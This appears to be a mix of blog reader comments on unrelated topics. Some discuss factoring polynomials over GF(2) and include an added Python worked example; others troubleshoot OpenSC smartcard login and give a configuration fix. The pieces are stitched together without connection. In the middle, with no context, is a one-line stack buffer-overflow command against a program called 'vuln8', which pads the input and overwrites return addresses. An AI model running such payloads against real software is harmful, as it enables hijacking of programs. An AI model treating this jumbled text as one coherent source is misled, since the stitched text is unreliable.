I am implementing the whole thing in C++ for polynomials of degree up to 512 in $GF(2)$, and the algorithm was failing only for polynomials of degree above 31…

It has been hard to find, but the problem was in the computation of P = P^2 % A: I was using the same data size as the input polynomial, and the exponentiation was overflowing. Solved by doubling the size of P (2 * A.size()).

Thank you.

That is not possible. Every factor of $A$ must have degree $d \le \deg(A)$, so it will be a common factor of $A$ and $X^{p^d}-X$.

Or should it stop at d == A.degree() (with A the original polynomial, not the reduced one), otherwise it never exits (it may exit if $X^{p^d}-X = KA$ for some $d$, giving $A$ as GCD, but that’s not what we are looking for… amirite?)

Side note: every time T == 1 you can save time by skipping A = A//T (A should not change), right?

BTW, great article and even great series of articles!

PS: I am not sure about the syntax to use for the formulas, and there is no preview: crossing fingers…

Following your description I stumbled over a reader / smartcard problem I’d like to share with you.

I was using

– Debian 9 (Stretch)

– a PC/SC reader

– a “O2 Micro Oz776 00 00” card with CardOS M4

Problems started with “First Test: sudo”. I got the error

ERROR:pam_pkcs11.c:717: sign_value() failed: C_Sign() failed: 0x00000005

After some debugging and searching I found the solution described at https://github.com/OpenSC/OpenSC/issues/802

In short:

Some PC/SC readers don’t report their dwMaxAPDUDataSize, which lets OpenSC assume a value of 256. If this is not correct for the reader, the signing command will fail.

The workaround recommended is: “As I do not see easy fix, I will just point every user with this problem to set max_send_size and max_recv_size to 65535 in OpenSC configuration file.”

The following changes in /usr/local/etc/opensc.conf worked for me:

# The following section shows definitions for PC/SC readers.
reader_driver pcsc {
    # Limit command and response sizes. Some Readers don't propagate their
    # transceive capabilities correctly. max_send_size and max_recv_size
    # allow setting the limits manually, for example to enable extended
    # length capabilities.
    # Default: max_send_size = 255, max_recv_size = 256;
    max_send_size = 65535;
    max_recv_size = 65536;
}

I hope this helps.

I have the following problem. Every time I try to run

pkcs15-init -C --profile pkcs15+onepin --pin 1234 --puk 123456 --label "Firas Kraiem"

it gives me the following error:

Failed to create PKCS #15 meta structure: Card command failed

Do you know what to do? I have a GemPC Twin SmartCard reader.

Cheers and thanks a lot

./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "1"x4 . "\xe8\xdf\xff\xff"')

One more thought about your post. I was playing around with polynomials over GF(2^k) for a given k > 1 (better not to use LaTeX tags as they seem to be disabled for comments), but the algorithm as it is stated above only works for GF(2)[X]. However, it can be generalized for GF(2^k) with a very small change in W, as follows:

W = T + T^2 + … + T^{2^{kd - 1}}

This way, W(W+1) = W^2 + W = T^{2^{kd}} + T = T^{(2^k)^d} + T, which implies that A | W(W+1).

So, the loop that computes W should be run for i in range(k*d-1).

Thanks again,

Lucio
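The W computation these comments discuss, as an added worked example (written for this page; it is not the article's or any commenter's code): polynomials over GF(2) are held as Python ints, W = T + T^2 + … + T^{2^{d-1}} mod A is built from d-1 squarings each reduced mod A, and gcd(A, W) splits a product of distinct degree-d irreducibles. The function names, the int representation and the sample polynomials (x^6+…+1 = 127 and x^12+x^9+x^6+x^3+1 = 4681) are this example's own choices.

```python
# Polynomials over GF(2) as Python ints: bit i holds the coefficient of X^i.
# Ints grow as needed, so a square gets its full 2n-1 bits; with fixed-width
# storage P must get twice the input size before P^2 (the first comment's bug).
def pmul(a, b):
    """Carry-less product of two GF(2)[X] polynomials."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        b >>= 1
    return r

def pdivmod(a, m):
    """Quotient and remainder of a by m in GF(2)[X] (m != 0)."""
    q, dm = 0, m.bit_length() - 1
    while a and a.bit_length() - 1 >= dm:
        s = a.bit_length() - 1 - dm
        q |= 1 << s
        a ^= m << s
    return q, a

def pgcd(a, b):
    while b:
        a, b = b, pdivmod(a, b)[1]
    return a

def trace_poly(t, a, d):
    """W = T + T^2 + ... + T^(2^(d-1)) mod A: d-1 squarings, each reduced mod A.
    (Over GF(2^k) the comment above runs k*d-1 squarings; GF(2^k) coefficient
    arithmetic is not implemented here.)"""
    t = pdivmod(t, a)[1]
    w = t
    for _ in range(d - 1):
        t = pdivmod(pmul(t, t), a)[1]
        w ^= t
    return w

def equal_degree_factor(a, d):
    """Split A, a product of distinct degree-d irreducibles, into those factors.
    A divides W(W+1), so gcd(A, W) is proper unless W is 0 or 1 mod every factor;
    T runs through X, X+1, X^2, ... and some monomial below deg(A) always splits."""
    if a.bit_length() - 1 == d:
        return [a]
    t = 2
    while True:
        g = pgcd(a, trace_poly(t, a, d))
        if g not in (1, a):
            return equal_degree_factor(g, d) + equal_degree_factor(pdivmod(a, g)[0], d)
        t += 1
```

With A = (x^3+x+1)(x^3+x^2+1) and T = x, W comes out as x^4+x^2+x and gcd(A, W) is x^3+x+1.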
